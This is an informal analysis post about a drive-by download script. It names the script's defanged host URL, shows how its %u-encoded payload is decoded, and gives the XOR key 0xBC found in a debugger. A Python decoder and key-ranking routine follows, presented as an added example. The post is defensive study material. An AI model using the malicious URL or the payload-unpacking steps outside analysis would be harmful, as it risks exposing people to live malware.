March 13 drive-by download (挂马) analysis report [XOR]

I never keep at it... sigh... too busy...

Begin:

1. hxxp://s.rdeg42.cn/03/5.js

This one... is easy to see through.

You have to replace "Game" with %u (note: to keep antivirus from flagging this page, %u has been swapped for %g here).

Decode it directly and you'll find it's a chunk of garbage...

Don't assume it's useless, though...

Using Redoce's %u enumeration feature, you'll find it enumerates an XOR, but that doesn't help; it's still a pile of garbage.

But at least that shows there is an XOR layer..

So... load it into Ollydbg... and you can see:

0040500B    80340B BC       xor     byte ptr [ebx+ecx], 0BC

Which means the XOR key is 0BC.

At this point there's no need to keep stepping further...

Just plug the XOR key into Redoce or a similar tool and it decrypts...
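The decoding step above, as an added Python example that is not the post's own code or Redoce's: it unescapes %u-style units into little-endian bytes, strips the single-byte XOR layer, and brute-forces the key over a constructed sample the way an enumeration tool does. The sample plaintext, the reuse of 0xBC as its key, the %g prefix and the marker list are assumptions made for illustration.

```python
import re

# Constructed sample, not taken from the post: a harmless ASCII string XOR-encoded with
# 0xBC (the key the author read off in Ollydbg) and packed into %uXXXX units the way the
# post's JavaScript does, using the post's %g stand-in for %u. Each unit is one
# little-endian 16-bit word, so the byte order inside every unit must be swapped back.
KEY = 0xBC
PLAINTEXT = b"kernel32.dll LoadLibraryA GetProcAddress ExitProcess"

# Strings that commonly survive inside decoded shellcode; a key that makes them appear
# is far more likely than one that merely yields printable bytes.
MARKERS = (b"kernel32", b"LoadLibrary", b"GetProcAddress", b".dll", b".exe", b"http")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same operation as 'xor byte ptr [ebx+ecx], 0BC' in a loop."""
    return bytes(b ^ key for b in data)


def to_unicode_escapes(data: bytes, prefix: str = "%u") -> str:
    """Pack bytes into %uXXXX units (little-endian); an odd trailing byte is padded with 0x00."""
    if len(data) % 2:
        data += b"\x00"
    return "".join(f"{prefix}{data[i + 1]:02x}{data[i]:02x}" for i in range(0, len(data), 2))


def from_unicode_escapes(text: str, prefix: str = "%u") -> bytes:
    """Undo %uXXXX (or %gXXXX) escapes back into the raw little-endian byte stream."""
    out = bytearray()
    for unit in re.findall(re.escape(prefix) + r"([0-9a-fA-F]{4})", text):
        word = int(unit, 16)
        out += bytes((word & 0xFF, word >> 8))
    return bytes(out)


def rank_xor_keys(data: bytes, top: int = 3) -> list:
    """Try all 256 single-byte keys; rank first by marker hits, then by printable bytes.
    This is the brute-force equivalent of the post's Redoce enumeration; when candidates
    tie, confirm the key in a debugger the way the author did."""
    scored = []
    for key in range(256):
        dec = xor_bytes(data, key)
        hits = sum(dec.count(m) for m in MARKERS)
        printable = sum(1 for b in dec if 0x20 <= b < 0x7F)
        scored.append((hits, printable, key))
    scored.sort(reverse=True)
    return [key for _, _, key in scored[:top]]


def decode(text: str, key: int, prefix: str = "%u") -> bytes:
    """Full pipeline: unescape the %u string, then strip the XOR layer with the known key."""
    return xor_bytes(from_unicode_escapes(text, prefix), key)


SAMPLE = to_unicode_escapes(xor_bytes(PLAINTEXT, KEY), prefix="%g")
```

On a real payload the marker score is only a hint; the last step is still reading the XOR instruction in the debugger as the post does.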

Looking further down, it's basically the same as the IE7 0D vulnerability....

No further write-up..